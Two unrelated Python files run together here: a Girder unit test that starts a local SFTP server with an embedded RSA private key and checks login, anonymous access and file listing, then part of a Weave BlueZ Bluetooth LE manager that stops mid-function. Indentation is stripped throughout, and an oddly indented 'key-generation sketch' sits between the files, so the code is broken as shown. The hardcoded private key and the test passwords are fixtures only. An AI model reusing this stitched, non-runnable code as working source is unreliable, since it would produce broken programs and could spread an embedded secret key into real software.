###############################################################################
# Copyright 2016 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import paramiko
import six
import socket
import stat
import threading
from .. import base
from girder.api import sftp
from six.moves import StringIO
server = None
TEST_PORT = 10551
TEST_KEY = paramiko.RSAKey.from_private_key(StringIO("""-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAwdH5tlaZu52adYvW57DcAFknzOKX8+/axDmQdTcg1HwEOnT2
TMSFGciwUQMmya+0i23ZOUtZQutj8fb66szrBZ7qpIvSG6TRyxGuM6PkfAUcBCHO
TGFzaJPnnvUXC8dlxoUIdBaUCmSblvj2q2CTNy53ybAmiiSpahjvBO16pvjbNn+i
EGucSQn71OTMhoSOWtS/VcJC6JPd6kxSdl1EiESbOrjAdNDKMBnfYCkxPG4ulAqe
y5jpfgQiUC0Q3CoWbj/ybAv73JsFndPcpvI8n5EsXeptuWI4CXSorYOuVwURLuzP
z1PkI4ZsYnSnuQG/GReAZnwVDaVJ/uhYMMs1sQIDAQABAoIBADKOmguFBW7aCntU
8cbX7Fsu5mHcTXS1ASSkO1lH+wlSHCw/bCvUKz/xiIRpRQnhCkBAdCQs0mjRS+3G
1ea/cyKxNFWdnz3UvWCyCPWxb50mHAu74bssxFToF8fv+IX7CkJBW1YkuZMIcUlt
QbKsa1o+hcKXb0YjkAl73YU0iQTaet7B1x1X0qkVPEWWURTg3z65TNI96t8p28dh
4HgEoU0Jtfsfzb7u1H4/m3Q28J1S+cTkER/VIgLzMeYXr2MooIQc3QAMXATpXkhM
y6u0LYh+kW1XD4ZnyzTp49BMf76rS8VhsYN6f+jLhJUf/5O+m8NFGuCq15TFyQAH
vMBxPRECgYEA4+fxYuuOq+SilYpejD4EMwvrClixHOfTojlnAyUaJZSnyVp/Y4l+
QmFmbNpfRKN1fv24e9f9CmA8nd5A3kxBjJFhzaaxbFG+jI47fqOu9NadXPHaxvyq
BI2aHx4sqp/Z/ct/klht5hxD8UFMRFbaaLYAojKg1nL0g/88wwwN9LUCgYEA2bZh
873OGT7sNXHin2rXD5XEYXqjLy51hed4ZdtJXFrKhg8ozWqaOZ79GXustdRanzTV
zDeTweI0hg7adbKyBNeuQF8VSOK6ws2wPPCuUbQTVYaepqPuT+VhzAB1GVJ1uF/T
YxgqXOvg9QwnZ4Fjlv3b/52R89bTP+Yr6GcQdo0CgYAvLQ38igIodtVo2xGjOhso
bekjZSSUdTCLvhIixoVZDiKFPaRs+EMYfozzL2jVDnj95otPp3ALu8wQabdHzMUs
0dNK/JxxbaJh+fc6yasnp10/phjBY//VnXIvytE4KIq5TGyF4KQvI960i+27n7bq
QfJzoMNGYNlYkXcEcPRamQKBgQCVCYWElirAnZKWA6BgAYO3547ILGwJoIRTZmHF
WJif4IdDvpzwAkoRqAUbrM5Oq1BeLI0vf9xmnbPXEdP7PpkfN4bSCkVH3+557NT4
4spypBOYOM/iw9YgW6bXQHjpHMn5rZ/H9oMJmXAmUGupL6o9cwtnsTZ49lcnJypn
riZXAQKBgQCgiJ/A11HX7fUgFzBB9no2Sy1hS3u1Ld35nZf7RDegVoEn/UdWdOxn
H2T9t0EzIoSqkfPRrsqN8sv/TMIohS6frOpBojEvwUs5mxjVwswq/QgBSV2FqYck
VeccLgZzTSMNzCDMbtM+zGG5WktzFojrMIhfD0SM3CB3jECF+Dfdtg==
-----END RSA PRIVATE KEY-----
"""))
def setUpModule():
global server
server = sftp.SftpServer(('localhost', TEST_PORT), TEST_KEY)
serverThread = threading.Thread(target=server.serve_forever)
serverThread.daemon = True
serverThread.start()
def tearDownModule():
if server:
server.shutdown()
server.server_close()
base.dropAllTestDatabases()
class SftpTestCase(base.TestCase):
def testSftpService(self):
users = ({
'email': 'admin@email.com',
'login': 'admin',
'firstName': 'First',
'lastName': 'Last',
'password': 'passwd'
}, {
'email': 'regularuser@email.com',
'login': 'regularuser',
'firstName': 'First',
'lastName': 'Last',
'password': 'passwd'
})
admin, user = [self.model('user').createUser(**user) for user in users]
collections = ({
'name': 'public collection',
'public': True,
'creator': admin
}, {
'name': 'private collection',
'public': False,
'creator': admin
})
privateFolder = self.model('folder').findOne({
'parentCollection': 'user',
'parentId': user['_id'],
'name': 'Private'
})
self.assertIsNotNone(privateFolder)
self.model('upload').uploadFromFile(
six.BytesIO(b'hello world'), size=11, name='test.txt', parentType='folder',
parent=privateFolder, user=user)
for coll in collections:
self.model('collection').createCollection(**coll)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Incorrect password should raise authentication error
with self.assertRaises(paramiko.AuthenticationException):
client.connect(
'localhost', TEST_PORT, username='admin', password='badpass', look_for_keys=False,
allow_agent=False)
# Authenticate as admin
client.connect(
'localhost', TEST_PORT, username='admin', password='passwd', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
self.assertEqual(sftpClient.listdir('/'), ['collection', 'user'])
# Listing an invalid top level entity should fail
with self.assertRaises(IOError):
sftpClient.listdir('/foo')
# Test listing of users, collections, and subfolders
self.assertEqual(set(sftpClient.listdir('/user/')), {'admin', 'regularuser'})
self.assertEqual(set(sftpClient.listdir('/user/admin')), {'Public', 'Private'})
self.assertEqual(
set(sftpClient.listdir('/collection')), {'public collection', 'private collection'})
self.assertEqual(sftpClient.listdir('/user/regularuser/Private'), ['test.txt'])
self.assertEqual(sftpClient.listdir('/user/regularuser/Private/test.txt'), ['test.txt'])
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/nonexistent')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private')
# Read a file using small enough buf size to require multiple chunks internally.
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
self.assertEqual(file.read(2), b'he')
self.assertEqual(file.read(), b'llo world')
# Make sure we enforce max buffer length
tmp, sftp.MAX_BUF_LEN = sftp.MAX_BUF_LEN, 2
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
with self.assertRaises(IOError):
file.read()
sftp.MAX_BUF_LEN = tmp
# Test stat capability
info = sftpClient.stat('/user/regularuser/Private')
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
# lstat should also work
info = sftpClient.lstat('/user/regularuser/Private/test.txt/test.txt')
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# File stat implementations should agree
info = file.stat()
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# Make sure we can stat the top-level entities
for path in ('/', '/user', '/collection'):
info = sftpClient.stat(path)
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
sftpClient.close()
client.close()
# Test that any username other than anonymous will fail using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('')
trans.close()
sock.close()
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('eponymous')
trans.close()
sock.close()
# Test that a connection can be opened for anonymous access using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
trans.auth_none(username='anonymous')
sftpClient = paramiko.SFTPClient.from_transport(trans)
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
trans.close()
sock.close()
# Test anonymous access
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
'localhost', TEST_PORT, username='anonymous', password='', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
client.close()
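
# Key-generation sketch (illustrative, not part of the test above): how a host key like
# TEST_KEY could be produced with paramiko instead of embedding a PEM string. The
# 2048-bit size and the output path are assumptions.
def exampleGenerateHostKey(path='/tmp/test_sftp_host_key'):
    key = paramiko.RSAKey.generate(2048)
    key.write_private_key_file(path)
    return key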
|
WeaveBluezMgr.py
|
#
# Copyright (c) 2015-2018 Nest Labs, Inc.
# Copyright (c) 2019-2020 Google LLC.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# BLE Central support for Weave Device Manager via BlueZ APIs.
#
from __future__ import absolute_import
from __future__ import print_function
import abc
import dbus
import dbus.service
import dbus.mainloop.glib
import gc
import logging
import os
import pprint
import subprocess
import sys
import threading
import time
import traceback
import uuid
import six.moves.queue
from ctypes import *
import six
from six.moves import range
try:
from gi.repository import GObject
except:
from pgi.repository import GObject
from .WeaveBleUtility import *
from .WeaveUtility import WeaveUtility
from .WeaveBleUtility import VoidPtrToUUIDString
from .WeaveBleBase import WeaveBleBase
weave_service = uuid.UUID('0000FEAF-0000-1000-8000-00805F9B34FB')
weave_tx = uuid.UUID('18EE2EF5-263D-4559-959F-4F9C429F9D11')
weave_rx = uuid.UUID('18EE2EF5-263D-4559-959F-4F9C429F9D12')
weave_service_short = uuid.UUID('0000FEAF-0000-0000-0000-000000000000')
chromecast_setup_service = uuid.UUID('0000FEA0-0000-1000-8000-00805F9B34FB')
chromecast_setup_service_short = uuid.UUID('0000FEA0-0000-0000-0000-000000000000')
BLUEZ_NAME = 'org.bluez'
ADAPTER_INTERFACE = BLUEZ_NAME + '.Adapter1'
DEVICE_INTERFACE = BLUEZ_NAME + '.Device1'
SERVICE_INTERFACE = BLUEZ_NAME + '.GattService1'
CHARACTERISTIC_INTERFACE = BLUEZ_NAME + '.GattCharacteristic1'
DBUS_PROPERTIES = 'org.freedesktop.DBus.Properties'
bleScanConnectGuardSec = 2.0
bleStatusTransitionTimeoutSec = 5.0
bleScanDefaultTimeoutSec = 10.0
bleConnectTimeoutSec = 15.0
bleDisConnectTimeoutSec = 10.0
bleSeviceDiscoveryTimeoutSec = 5.0
bleCharDiscoveryTimeoutSec = 5.0
bleSubscribeTimeoutSec = 5.0
bleWriteCharacteristicTimeoutSec = 10.0
bleIdleDelta = 0.1
secondsToMilliseconds = 1000
def get_bluez_objects(bluez, bus, interface, prefix_path):
results = []
if bluez is None or bus is None or interface is None or prefix_path is None:
return results
for item in six.iteritems(bluez.GetManagedObjects()):
delegates = item[1].get(interface)
if not delegates:
continue
slice = {}
if item[0].startswith(prefix_path):
slice['object'] = bus.get_object(BLUEZ_NAME, item[0])
slice['path'] = item[0]
results.append(slice)
return results
class BluezDbusAdapter():
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger('WeaveBLEMgr')
self.object = bluez_obj
self.adapter = dbus.Interface(bluez_obj, ADAPTER_INTERFACE)
self.adapter_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.adapter_event = threading.Event()
self.bluez = bluez
self.bus = bus
self.path = self.adapter.object_path
self.signalReceiver = None
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy adapter")
self.adapter_unregister_signal()
self.adapter = None
self.adapter_properties = None
self.adapter_event.clear()
self.bluez = None
self.bus = None
self.object = None
self.path = None
self.signalReceiver = None
def adapter_register_signal(self):
if self.signalReceiver is None:
self.logger.debug("add adapter signal")
self.signalReceiver = self.bus.add_signal_receiver(self.adapter_on_prop_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path)
def adapter_unregister_signal(self):
if self.signalReceiver is not None:
self.logger.debug(" remove adapter signal")
self.bus.remove_signal_receiver(self.signalReceiver,
signal_name="PropertiesChanged",
dbus_interface="org.freedesktop.DBus.Properties")
def adapter_on_prop_changed_cb(self, interface, changed_properties, invalidated_properties):
if len(changed_properties) == 0:
self.logger.debug( "changed_properties is empty")
return
if len(invalidated_properties) > 0:
self.logger.debug( "invalidated_properties is not empty %s" % str(invalidated_properties))
return
if interface == ADAPTER_INTERFACE:
if 'Discovering' in changed_properties:
self.adapter_event.set()
def adapter_bg_scan(self, enable):
self.adapter_event.clear()
action_flag = False
try:
if enable:
if not self.Discovering:
action_flag = True
self.logger.info( "scanning started")
self.adapter.StartDiscovery()
else:
self.logger.info("it has started scanning")
else:
if self.Discovering:
action_flag = True
self.adapter.StopDiscovery()
self.logger.info("scanning stopped")
else:
print("it has stopped scanning")
if action_flag:
if not self.adapter_event.wait(bleStatusTransitionTimeoutSec):
if enable:
self.logger.debug("scan start error")
else:
self.logger.debug("scan stop error")
self.adapter_event.clear()
except dbus.exceptions.DBusException as ex:
self.adapter_event.clear()
self.logger.debug(str(ex))
except:
self.logger.debug(traceback.format_exc())
@property
def Address(self):
try:
result = self.adapter_properties.Get(ADAPTER_INTERFACE, 'Address')
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def UUIDs(self):
try:
return self.adapter_properties.Get(ADAPTER_INTERFACE, 'UUIDs')
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
def SetDiscoveryFilter(self, dict):
try:
self.adapter.SetDiscoveryFilter(dict)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except:
self.logger.debug(traceback.format_exc())
@property
def Discovering(self):
try:
result = self.adapter_properties.Get(ADAPTER_INTERFACE, 'Discovering')
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
def DiscoverableTimeout(self, timeoutSec):
try:
result = self.adapter_properties.Set(ADAPTER_INTERFACE, 'DiscoverableTimeout', timeoutSec)
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
def Powered(self, enable):
try:
result = self.adapter_properties.Set(ADAPTER_INTERFACE, 'Powered', enable)
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
def find_devices(self, uuids):
devices = [BluezDbusDevice(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, DEVICE_INTERFACE, self.path)]
found = []
for device in devices:
for i in device.uuids:
if i in uuids:
found.append(device)
break
return found
def clear_adapter(self):
devices = [BluezDbusDevice(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, DEVICE_INTERFACE, self.path)]
for device in devices:
try:
if device.Connected:
device.device_bg_connect(False)
self.adapter.RemoveDevice(device.device.object_path)
except:
pass
class BluezDbusDevice():
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger('WeaveBLEMgr')
self.object = bluez_obj
self.device = dbus.Interface(bluez_obj, DEVICE_INTERFACE)
self.device_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.path = self.device.object_path
self.device_event = threading.Event()
if self.Name:
try:
self.device_id = uuid.uuid3(uuid.NAMESPACE_DNS, self.Name)
except UnicodeDecodeError:
self.device_id = uuid.uuid3(uuid.NAMESPACE_DNS, self.Name.encode('utf-8'))
else:
self.device_id = uuid.uuid4()
self.bluez = bluez
self.bus = bus
self.signalReceiver = None
self.path = self.device.object_path
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy device")
self.device_unregister_signal()
self.device = None
self.device_properties = None
self.device_event = None
self.device_id = None
self.bluez = None
self.bus = None
self.object = None
self.signalReceiver = None
def device_register_signal(self):
if self.signalReceiver is None:
self.logger.debug("add device signal")
self.signalReceiver = self.bus.add_signal_receiver(self.device_on_prop_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path)
def device_unregister_signal(self):
if self.signalReceiver is not None:
self.logger.debug("remove device signal")
self.bus.remove_signal_receiver(self.signalReceiver,
signal_name="PropertiesChanged",
dbus_interface=DBUS_PROPERTIES)
def device_on_prop_changed_cb(self, interface, changed_properties, invalidated_properties):
if len(changed_properties) == 0:
self.logger.debug( "changed_properties is empty")
return
if len(invalidated_properties) > 0:
self.logger.debug( "invalidated_properties is not empty %s" % str(invalidated_properties))
return
if interface == DEVICE_INTERFACE:
if 'Connected' in changed_properties:
self.device_event.set()
def device_bg_connect(self, enable):
time.sleep(bleScanConnectGuardSec)
action_flag = False
self.device_event.clear()
try:
if enable:
if not self.Connected:
action_flag = True
self.device.Connect()
self.logger.info("BLE connecting")
else:
self.logger.info("BLE has connected")
else:
if self.Connected:
action_flag = True
self.device.Disconnect()
self.logger.info("BLE disconnected")
else:
self.logger.info("BLE has disconnected")
if action_flag:
if not self.device_event.wait(bleStatusTransitionTimeoutSec):
if enable:
self.logger.info("BLE connect error")
else:
self.logger.info("BLE disconnect error")
self.device_event.clear()
except dbus.exceptions.DBusException as ex:
self.device_event.clear()
self.logger.info(str(ex))
except:
self.logger.debug(traceback.format_exc())
def service_discover(self, gatt_dic):
self.logger.info('Discovering services')
try:
expired = time.time() + bleSeviceDiscoveryTimeoutSec
while time.time() < expired:
if self.ServicesResolved:
services = [BluezDbusGattService(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, SERVICE_INTERFACE, self.path)]
for service in services:
if service.uuid in gatt_dic['services']:
self.logger.info("Service discovering success")
return service
time.sleep(bleIdleDelta)
self.logger.error("Service discovering fail")
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def uuids(self):
try:
uuids = self.device_properties.Get(DEVICE_INTERFACE, 'UUIDs')
uuid_result = []
for i in uuids:
if len(str(i)) == 4:
uuid_normal = '0000%s-0000-0000-0000-000000000000' % i
else:
uuid_normal = i
uuid_result.append(uuid.UUID(str(uuid_normal)))
return uuid_result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def Address(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, 'Address')
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def Name(self):
try:
name = self.device_properties.Get(DEVICE_INTERFACE, 'Name')
return name
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def Connected(self):
try:
result = self.device_properties.Get(DEVICE_INTERFACE, 'Connected')
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
@property
def TxPower(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, 'TxPower')
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def RSSI(self):
try:
result = self.device_properties.Get(DEVICE_INTERFACE, 'RSSI')
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def Adapter(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, 'Adapter')
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def ServiceData(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, 'ServiceData')
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def ServicesResolved(self):
try:
result = self.device_properties.Get(DEVICE_INTERFACE, 'ServicesResolved')
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
class BluezDbusGattService():
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger('WeaveBLEMgr')
self.object = bluez_obj
self.service = dbus.Interface(bluez_obj, SERVICE_INTERFACE)
self.service_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.bluez = bluez
self.bus = bus
self.path = self.service.object_path
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy GattService")
self.service = None
self.service_properties = None
self.bluez = None
self.bus = None
self.object = None
self.path = None
@property
def uuid(self):
try:
result = uuid.UUID(str(self.service_properties.Get(SERVICE_INTERFACE, 'UUID')))
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def Primary(self):
try:
result =bool(self.service_properties.Get(SERVICE_INTERFACE, 'Primary'))
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
@property
def Device(self):
try:
result = self.service_properties.Get(SERVICE_INTERFACE, 'Device')
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
def find_characteristic(self, uuid):
try:
expired = time.time() + bleCharDiscoveryTimeoutSec
while time.time() < expired:
characteristics = [BluezDbusGattCharacteristic(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, CHARACTERISTIC_INTERFACE, self.path)]
for characteristic in characteristics:
if characteristic.uuid == uuid:
return characteristic
time.sleep(bleIdleDelta)
self.logger.error("Char discovering fail")
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
class BluezDbusGattCharacteristic():
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger('WeaveBLEMgr')
self.object = bluez_obj
self.characteristic = dbus.Interface(bluez_obj, CHARACTERISTIC_INTERFACE)
self.characteristic_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.received = None
self.path = self.characteristic.object_path
self.bluez = bluez
self.bus = bus
self.signalReceiver = None
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy GattCharacteristic")
self.gattCharacteristic_unregister_signal()
self.characteristic = None
self.object = None
self.characteristic_properties = None
self.received = None
self.bluez = None
self.bus = None
self.path = None
self.signalReceiver = None
def gattCharacteristic_register_signal(self):
if not self.signalReceiver:
self.logger.debug("add GattCharacteristic signal")
self.signalReceiver = self.bus.add_signal_receiver(self.gatt_on_characteristic_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path)
def gattCharacteristic_unregister_signal(self):
if self.signalReceiver:
self.logger.debug("remove GattCharacteristic signal")
self.bus.remove_signal_receiver(self.signalReceiver,
bus_name=BLUEZ_NAME,
signal_name="PropertiesChanged",
dbus_interface=DBUS_PROPERTIES,
path=self.path)
self.signalReceiver = None
def gatt_on_characteristic_changed_cb(self, interface, changed_properties, invalidated_properties):
self.logger.debug("property change in" + str(self.characteristic) + str(changed_properties))
if len(changed_properties) == 0:
return
if len(invalidated_properties) > 0:
return
if interface == CHARACTERISTIC_INTERFACE:
if 'Value' in changed_properties:
if self.received:
self.received(changed_properties['Value'])
def WriteValue(self, value, options, reply_handler, error_handler, timeout):
try:
self.characteristic.WriteValue(value, options, reply_handler=reply_handler, error_handler=error_handler, timeout=timeout)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except:
self.logger.debug(traceback.format_exc())
@property
def uuid(self):
try:
result = uuid.UUID(str(self.characteristic_properties.Get(CHARACTERISTIC_INTERFACE, 'UUID')))
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
def StartNotify(self, cbfunct, reply_handler, error_handler, timeout):
try:
if not cbfunct:
self.logger.info("please provide the notify callback function")
self.received = cbfunct
self.gattCharacteristic_register_signal()
self.characteristic.StartNotify(reply_handler=reply_handler, error_handler=error_handler, timeout=timeout)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except:
self.logger.debug(traceback.format_exc())
def StopNotify(self, reply_handler, error_handler, timeout):
try:
self.logger.debug("stopping notifying")
self.characteristic.StopNotify(reply_handler=reply_handler, error_handler=error_handler, timeout=timeout)
self.gattCharacteristic_unregister_signal()
self.received = None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except:
self.logger.debug(traceback.format_exc())
@property
def Notifying(self):
try:
result = self.characteristic_properties.Get(CHARACTERISTIC_INTERFACE, 'Notifying')
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
class BluezManager(WeaveBleBase):
def __init__(self, devMgr, logger=None):
if logger:
self.logger = logger
else:
self.logger = logging.getLogger('WeaveBLEMgr')
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
self.scan_quiet= False
self.peripheral_list = []
self.weave_queue = six.moves.queue.Queue()
self.Gmainloop = None
self.daemon_thread = None
self.adapter = None
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
GObject.threads_init()
dbus.mainloop.glib.threads_init()
self.bus = dbus.SystemBus()
self.bluez = dbus.Interface(self.bus.get_object(BLUEZ_NAME, '/'), 'org.freedesktop.DBus.ObjectManager')
self.target = None
self.service = None
self.orig_input_hook = None
self.hookFuncPtr = None
self.connect_state = False
self.tx = None
self.rx = None
self.setInputHook(self.readlineCB)
self.devMgr = devMgr
self.devMgr.SetBlockingCB(self.devMgrCB)
def HandleBleEventCB():
return self.GetBleEvent()
def HandleBleWriteCharCB(connObj, svcId, charId, buffer, length):
return self.WriteBleCharacteristic(connObj, svcId, charId, buffer, length)
def HandleBleSubscribeCB(connObj, svcId, charId, subscribe):
return self.SubscribeBleCharacteristic(connObj, svcId, charId, subscribe)
def HandleBleCloseCB(connObj):
return self.CloseBle(connObj)
self.devMgr.SetBleEventCB(HandleBleEventCB)
self.devMgr.SetBleWriteCharCB(HandleBleWriteCharCB)
self.devMgr.SetBleSubscribeCharCB(HandleBleSubscribeCB)
self.devMgr.SetBleCloseCB(HandleBleCloseCB)
def __del__(self):
self.disconnect()
self.setInputHook(self.orig_input_hook)
self.devMgr.SetBlockingCB(None)
self.devMgr.SetBleEventCB(None)
def ble_adapter_select(self, identifier=None):
if self.adapter:
self.adapter.destroy()
self.adapter = None
self.adapter = self.get_adapter_by_addr(identifier)
self.adapter.adapter_register_signal()
self.adapter.Powered(False)
self.adapter.Powered(True)
def ble_adapter_print(self):
try:
adapters = [BluezDbusAdapter(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, ADAPTER_INTERFACE, '/org/bluez')]
for i in range(len(adapters)):
self.logger.info("adapter %s = %s" % (i, adapters[i].Address))
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
def get_adapter_by_addr(self, identifier):
try:
adapters = [BluezDbusAdapter(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, ADAPTER_INTERFACE, '/org/bluez')]
if identifier is None:
return adapters[0]
if len(adapters) > 0:
for adapter in adapters:
if str(adapter.Address).upper() == str(identifier).upper():
return adapter
self.logger.info("adapter %s cannot be found, expect the ble mac address" % (identifier))
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
def runLoopUntil(self, target=None, **kwargs):
if target:
self.daemon_thread = threading.Thread(target=self.running_thread, args=(target, kwargs))
self.daemon_thread.daemon = True
self.daemon_thread.start()
try:
self.Gmainloop = GObject.MainLoop()
self.Gmainloop.run()
except KeyboardInterrupt:
self.Gmainloop.quit()
sys.exit(1)
def running_thread(self, target, kwargs):
try:
while not self.Gmainloop or not self.Gmainloop.is_running():
time.sleep(0.00001)
target(**kwargs)
except Exception as err:
